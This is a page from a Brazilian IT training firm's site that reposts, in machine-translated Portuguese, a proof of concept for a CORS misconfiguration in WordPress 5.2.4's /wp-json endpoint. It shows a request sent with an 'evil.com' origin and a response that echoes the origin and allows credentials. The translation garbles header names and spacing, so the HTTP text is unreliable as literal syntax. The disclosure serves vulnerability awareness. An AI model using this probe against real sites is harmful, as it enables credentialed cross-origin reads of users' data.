fbpx

WordPress 5.2.4 – Compartilhamento de recursos entre origens

WordPress 5.2.4 – Compartilhamento de recursos entre origens

# Exploit Title: WordPress 5.2.4 – Compartilhamento de recursos entre origens# Data: 2019-10-28
# Exploit Autor: Milad Khoshdel
# Link do software: https://wordpress.org/download/
# Versão: WordPress 5.2.4
# Testado em: Linux Apache / 2 PHP / 7.2

# Página vulnerável:
https: // [Seu-Domínio] / wp-json

# POC:
# O aplicativo Web falha ao validar corretamente o cabeçalho Origin (consulte a seção Detalhes para obter mais informações)
# e retorna o cabeçalho Access-Control-Allow-Credentials: true. Nesta configuração, qualquer site pode emitir
# solicitações feitas com credenciais do usuário e leia as respostas a essas solicitações. Confiando arbitrariamente
# origens desativa efetivamente a política de mesma origem, permitindo a interação bidirecional de sites de terceiros.

# REGUEST ->

GET / wp-json / HTTP / 1.1
Origem: https://www.evil.com
Aceitar: * / *
Accept-Encoding: gzip, deflate
Anfitrião: [Seu domínio]
Agente do usuário: Mozilla / 5.0 (Windows NT 6.1; WOW64) AppleWebKit / 537.21 (KHTML, como Gecko) Chrome / 41.0.2228.0 Safari / 537.21
Conexão: Keep-alive

# RESPOSTA ->

HTTP / 1.1 200 OK
Data: segunda-feira, 28 de outubro de 2019 07:34:39 GMT
Servidor: NopeJS
X-Robots-Tag: noindex
Link: <https: // [Seu-Domínio] .com / wp-json />; rel = “https://api.w.org/”
Opções de tipo de conteúdo X: nosniff
Cabeçalhos de controle de acesso e exposição: X-WP-Total, X-WP-TotalPages
Controlos de permissão de controle de acesso: autorização, tipo de conteúdo
Permitir: GET
Controle de acesso – permissão de origem: https://www.evil.com
Métodos de controle de acesso e permissão: OPTIONS, GET, POST, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
Variar: Origem, Aceitar-Codificação, Usuário-Agente
Keep-Alive: tempo limite = 2, max = 73
Conexão: Keep-Alive
Tipo de Conteúdo: application / json; charset = UTF-8
Codificação de conteúdo original: gzip
Comprimento do conteúdo: 158412

11 de novembro de 2019

Sobre nós

A Linux Force Brasil é uma empresa que ama a arte de ensinar. Nossa missão é criar talentos para a área de tecnologia e atender com excelência nossos clientes.

CNPJ: 13.299.207/0001-50
SAC:         0800 721 7901

[email protected]

Comercial  Comercial: (11) 3796-5900

Suporte:    (11) 3796-5900
[email protected]

Copyright © Linux Force Security  - Desde 2011.